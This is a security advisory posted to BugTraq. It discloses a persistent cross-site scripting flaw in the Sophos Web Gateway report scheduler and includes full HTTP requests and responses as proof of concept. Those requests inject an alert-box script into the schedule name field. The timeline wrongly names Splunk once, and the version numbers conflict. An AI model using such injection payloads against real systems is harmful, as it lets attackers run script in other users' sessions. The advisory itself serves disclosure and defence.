BugTraq
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Jan 26 2018 08:08PM
KoreLogic Disclosures (disclosures korelogic com)
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web
Page Generation, CWE-80: Improper Neutralization of
Script-Related HTML Tags in a Web Page
Impact: Arbitrary Code Execution
Attack vector: HTTP

2. Vulnerability Description

The report scheduler menu within the management portal
contains a persistent cross site scripting vulnerability. This
vulnerability can be used to target other users of the same
portal.

3. Technical Description

A valid session is required to create the report with the
persistent cross site scripting payload attached. An example
attack payload has been included below. This payload is designed
to trigger an alert box with the number one being displayed.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close

action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%
59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%
31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%
61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%
61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%
2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%
77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%
5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%
5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%
64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%
65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%
74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%
63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%
79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%
74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%
65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%
72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41

{"status":0,"statusMsg":"Settings saved"}

The URL-encoded input being passed in input parameter can be
decoded to a array containing a single JSON buffer.

[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test (at) test (dot) asda [email concealed]sd",
"schedule_id": "dGVzdA==", "owner": "admin"}]

Within the JSON buffer is a key called txt_schedule_name. The
value for this key is the name of the scheduled report. This
value is included in the report schedule list.

"txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are then stored. When the report schedule is
viewed, the resulting JSON is sent as content-type text/html
instead of application/json, causing the browser to execute any
unescaped javascript it contains. The output is HTML-encoded
with the exception of the txt_schedule_name: value which is
not sanitized, and the payload triggers.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close

action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c1195563
2068abddd

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1365

{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a168
96568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_coun
t":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","s
b_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>al
ert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.
asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"
title=\"test<script>alert(1);<\/script>\">test<script>
alert(1);<\/script><\/a><\/div><div
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\
/ul>"}

4. Mitigation and Remediation Recommendation

The vendor has released version 4.3.3.1 of the Web Gateway
which addesses this issue. Release notes available at:

http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.08.17 - KoreLogic submits vulnerability details to Sophos.
2017.08.17 - Sophos confirms receipt.
2017.09.29 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.10.17 - KoreLogic requests an update from Sophos.
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in
the next maintenance release, scheduled for the end of
November. Sophos asks KoreLogic to hold disclosure until
the new version is released.
2017.10.23 - 45 business days have elapsed since the vulnerability
was reported to Splunk.
2017.11.02 - Sophos notifies KoreLogic that the maintenance release
has gone live.
2018.01.26 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Poli
cy.v2.2.txt

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlprisQaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQxPawf/QC+duVUlcs5dUyn29hck
xkLHtFQxt7XcwBpI7BgtLfJL93qj+aP9TAeZlSPUj7qt+amt6OMULU4Z+tmIfDkb
ghBHVMwLdpLgb/0ZHblOqLjyuTBrvjYM8sDCo3Si2sQi7FbqYBsdxpQqYlNAlF7k
JfNK+1EaVFNkyqZnGg3YnzqM8M1eYc+Ew4QgsM7VCC3oDHrVAeg/RTepJ8FdAqrU
Ez3lPdb0JnLy32ojk+qLiPx1RE1ahbRu7Ydab5mAXKe5f9UKq7l4vD1rcY6Bm900
M0vX0mEuEkgf30ilPAUkKWD164W94MzEwWPg8Qj2O+9t6mg0sn1Cf+8eoHHMZOx9
yA==
=i8h/
-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus